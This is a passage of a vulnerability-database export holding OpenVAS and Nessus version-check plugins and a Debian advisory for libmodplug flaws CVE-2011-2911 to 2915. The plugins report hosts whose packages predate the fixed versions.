value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:19:03 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name: \"FEDORA\", value: \"2011-10452\");\n script_name(\"Fedora Update for libmodplug FEDORA-2011-10452\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libmodplug\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmodplug\", rpm:\"libmodplug~0.8.8.4~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:27:36", "references": ["http://www.ubuntu.com/usn/usn-1255-1/", "1255-1"], "pluginID": "840800", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1255-1", "edition": 4, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-11-11T00:00:00", "title": "Ubuntu Update for libmodplug USN-1255-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840800", "id": "OPENVAS:840800", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1255_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for libmodplug USN-1255-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Hossein Lotfi discovered that libmodplug did not correctly handle certain\n malformed media files. If a user or automated system were tricked into\n opening a crafted media file, an attacker could cause a denial of service\n or possibly execute arbitrary code with privileges of the user invoking the\n program. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\n\n It was discovered that libmodplug did not correctly handle certain\n malformed media files. If a user or automated system were tricked into\n opening a crafted media file, an attacker could cause a denial of service\n or possibly execute arbitrary code with privileges of the user invoking the\n program. (CVE-2011-2914, CVE-2011-2915)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1255-1\";\ntag_affected = \"libmodplug on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1255-1/\");\n script_id(840800);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:55:33 +0530 (Fri, 11 Nov 2011)\");\n script_xref(name: \"USN\", value: \"1255-1\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"Ubuntu Update for libmodplug USN-1255-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug1\", ver:\"1:0.8.8.1-1ubuntu1.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug0c2\", ver:\"1:0.8.7-1ubuntu0.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug1\", ver:\"1:0.8.8.1-2ubuntu0.3\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:01:22", "references": ["http://lists.centos.org/pipermail/centos-announce/2011-September/017720.html", "2011:1264"], "pluginID": "1361412562310881372", "description": "Check for the Version of gstreamer-plugins", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-07-30T00:00:00", "title": "CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310881372", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881372", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n \n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\";\n\ntag_affected = \"gstreamer-plugins on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-September/017720.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881372\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:37:14 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2011:1264\");\n script_name(\"CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gstreamer-plugins\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:56:38", "references": ["http://lists.centos.org/pipermail/centos-announce/2011-September/017720.html", "2011:1264"], "pluginID": "881372", "description": "Check for the Version of gstreamer-plugins", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-07-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2017-12-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881372", "id": "OPENVAS:881372", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n \n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\";\n\ntag_affected = \"gstreamer-plugins on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-September/017720.html\");\n script_id(881372);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:37:14 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2011:1264\");\n script_name(\"CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gstreamer-plugins\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:28:56", "references": [], "pluginID": "136141256231071300", "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-14.", "edition": 4, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-04-30T00:00:00", "title": "Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:136141256231071300", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071300", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201203_14.nasl 11671 2018-09-28 10:44:05Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71300\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11671 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 12:44:05 +0200 (Fri, 28 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Audacious Plugins could result in\n execution of arbitrary code or Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Audacious Plugins users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-plugins/audacious-plugins-3.1'\n\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=383991\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201203-14.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-plugins/audacious-plugins\", unaffected: make_list(\"ge 3.1\"), vulnerable: make_list(\"lt 3.1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:14:29", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "1:0.8.8.1-1+squeeze2", "arch": "all", "packageFilename": "libmodplug-dev_1:0.8.8.1-1+squeeze2_all.deb", "packageName": "libmodplug-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1:0.8.8.1-1+squeeze2", "arch": "all", "packageFilename": "libmodplug1_1:0.8.8.1-1+squeeze2_all.deb", "packageName": "libmodplug1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1:0.8.8.1-1+squeeze2", "arch": "all", "packageFilename": "libmodplug_1:0.8.8.1-1+squeeze2_all.deb", "packageName": "libmodplug", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2415-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nFebruary 21, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libmodplug\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2011-1761 CVE-2011-2911 CVE-2011-2912 CVE-2011-2913\n CVE-2011-2914 CVE-2011-2915\n\nSeveral vulnerabilities that can lead to the execution of arbitrary code\nhave been discovered in libmodplug, a library for mod music based on\nModPlug. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1761\n\n epiphant discovered that the abc file parser is vulnerable to several\n stack-based buffer overflows that potentially lead to the execution\n of arbitrary code.\n\nCVE-2011-2911\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadWav\n function is vulnerable to an integer overflow which leads to a\n heap-based buffer overflow. An attacker can exploit this flaw to\n potentially execute arbitrary code by tricking a victim into opening\n crafted WAV files.\n\nCVE-2011-2912\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadS3M\n function is vulnerable to a stack-based buffer overflow. An attacker\n can exploit this flaw to potentially execute arbitrary code by\n tricking a victim into opening crafted S3M files.\n\nCVE-2011-2913\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadAMS\n function suffers from an off-by-one vulnerability that leads to \n memory corruption. An attacker can exploit this flaw to potentially\n execute arbitrary code by tricking a victim into opening crafted AMS\n files.\n\nCVE-2011-2914\n\n It was discovered that the CSoundFile::ReadDSM function suffers\n from an off-by-one vulnerability that leads to memory corruption.\n An attacker can exploit this flaw to potentially execute arbitrary\n code by tricking a victim into opening crafted DSM files.\n\nCVE-2011-2915\n\n It was discovered that the CSoundFile::ReadAMS2 function suffers\n from an off-by-one vulnerability that leads to memory corruption.\n An attacker can exploit this flaw to potentially execute arbitrary\n code by tricking a victim into opening crafted AMS files.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:0.8.8.1-1+squeeze2.\n\nFor the testing (wheezy) and unstable (sid) distributions, this problem\nhas been fixed in version 1:0.8.8.4-1.\n\nWe recommend that you upgrade your libmodplug packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "reporter": "Debian", "published": "2012-02-22T00:06:11", "title": "[SECURITY] [DSA 2415-1] libmodplug security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:29", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2012-02-22T00:06:11", "id": "DEBIAN:DSA-2415-1:6A5A5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00042.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:59:39", "references": ["https://security-tracker.debian.org/tracker/CVE-2011-1761", "https://security-tracker.debian.org/tracker/CVE-2011-2915", "https://packages.debian.org/source/squeeze/libmodplug", "https://security-tracker.debian.org/tracker/CVE-2011-2914", "https://security-tracker.debian.org/tracker/CVE-2011-2911", "http://www.debian.org/security/2012/dsa-2415", "https://security-tracker.debian.org/tracker/CVE-2011-2912", "https://security-tracker.debian.org/tracker/CVE-2011-2913"], "pluginID": "58078", "description": "Several vulnerabilities that can lead to the execution of arbitrary code have been discovered in libmodplug, a library for MOD music based on ModPlug. The Common Vulnerabilities and Exposures project identifies the following issues :\n\n - CVE-2011-1761 epiphant discovered that the abc file parser is vulnerable to several stack-based buffer overflows that potentially lead to the execution of arbitrary code.\n\n - CVE-2011-2911 Hossein Lotfi of Secunia discovered that the CSoundFile::ReadWav function is vulnerable to an integer overflow which leads to a heap-based buffer overflow. An attacker can exploit this flaw to potentially execute arbitrary code by tricking a victim into opening crafted WAV files.\n\n - CVE-2011-2912 Hossein Lotfi of Secunia discovered that the CSoundFile::ReadS3M function is vulnerable to a stack-based buffer overflow. An attacker can exploit this flaw to potentially execute arbitrary code by tricking a victim into opening crafted S3M files.\n\n - CVE-2011-2913 Hossein Lotfi of Secunia discovered that the CSoundFile::ReadAMS function suffers from an off-by-one vulnerability that leads to memory corruption. An attacker can exploit this flaw to potentially execute arbitrary code by tricking a victim into opening crafted AMS files.\n\n - CVE-2011-2914 It was discovered that the CSoundFile::ReadDSM function suffers from an off-by-one vulnerability that leads to memory corruption. An attacker can exploit this flaw to potentially execute arbitrary code by tricking a victim into opening crafted DSM files.\n\n - CVE-2011-2915 It was discovered that the CSoundFile::ReadAMS2 function suffers from an off-by-one vulnerability that leads to memory corruption. An attacker can exploit this flaw to potentially execute arbitrary code by tricking a victim into opening crafted AMS files.", "edition": 5, "reporter": "Tenable", "published": "2012-02-22T00:00:00", "title": "Debian DSA-2415-1 : libmodplug - several vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-07-09T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:libmodplug"], "id": "DEBIAN_DSA-2415.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=58078", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2415. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58078);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/09 14:30:25\");\n\n script_cve_id(\"CVE-2011-1761\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(47624, 48979);\n script_xref(name:\"DSA\", value:\"2415\");\n\n script_name(english:\"Debian DSA-2415-1 : libmodplug - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities that can lead to the execution of arbitrary\ncode have been discovered in libmodplug, a library for MOD music based\non ModPlug. The Common Vulnerabilities and Exposures project\nidentifies the following issues :\n\n - CVE-2011-1761\n epiphant discovered that the abc file parser is\n vulnerable to several stack-based buffer overflows that\n potentially lead to the execution of arbitrary code.\n\n - CVE-2011-2911\n Hossein Lotfi of Secunia discovered that the\n CSoundFile::ReadWav function is vulnerable to an integer\n overflow which leads to a heap-based buffer overflow. An\n attacker can exploit this flaw to potentially execute\n arbitrary code by tricking a victim into opening crafted\n WAV files.\n\n - CVE-2011-2912\n Hossein Lotfi of Secunia discovered that the\n CSoundFile::ReadS3M function is vulnerable to a\n stack-based buffer overflow. An attacker can exploit\n this flaw to potentially execute arbitrary code by\n tricking a victim into opening crafted S3M files.\n\n - CVE-2011-2913\n Hossein Lotfi of Secunia discovered that the\n CSoundFile::ReadAMS function suffers from an off-by-one\n vulnerability that leads to memory corruption. An\n attacker can exploit this flaw to potentially execute\n arbitrary code by tricking a victim into opening crafted\n AMS files.\n\n - CVE-2011-2914\n It was discovered that the CSoundFile::ReadDSM function\n suffers from an off-by-one vulnerability that leads to\n memory corruption. An attacker can exploit this flaw to\n potentially execute arbitrary code by tricking a victim\n into opening crafted DSM files.\n\n - CVE-2011-2915\n It was discovered that the CSoundFile::ReadAMS2 function\n suffers from an off-by-one vulnerability that leads to\n memory corruption. An attacker can exploit this flaw to\n potentially execute arbitrary code by tricking a victim\n into opening crafted AMS files.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-1761\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2913\"\n );\n 